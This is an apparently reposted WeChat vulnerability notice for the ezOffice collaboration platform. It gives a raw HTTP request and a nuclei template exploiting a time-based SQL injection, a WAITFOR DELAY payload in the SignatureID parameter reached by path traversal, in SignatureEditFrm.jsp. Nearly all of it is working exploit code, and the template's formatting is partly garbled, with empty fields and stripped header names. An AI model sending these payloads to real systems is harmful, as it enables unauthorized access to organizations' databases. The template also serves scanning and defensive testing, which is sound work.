GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iWebRevision.jsp/Signature/SignatureEditFrm.jsp?SignatureID=1;WAITFOR%20DELAY%20%270:0:3%27-- HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Upgrade-Insecure-Requests: 1
nuclei
id: wanhu-ezoffice-SignatureEditFrm-SQL
info:
name: 万户协同办公平台ezoffice_SignatureEditFrm_存在SQL注入漏洞
author: 小白菜
severity: critical
description: |
metadata:
:
reference:
https://
tags: auto
http:
raw:
|
GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iWebRevision.jsp/Signature/SignatureEditFrm.jsp?SignatureID=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{Hostname}}
1 :
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
gzip, deflate, br :
zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 :
close :
matchers:
type: dsl
dsl:
duration>=5 && contains_all(body,"印签管理")
原文始发于微信公众号(小白菜安全):漏洞推送|某户协同办公平台ezoffice_SignatureEditFrm_存在SQL注入漏洞(附nuclei)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论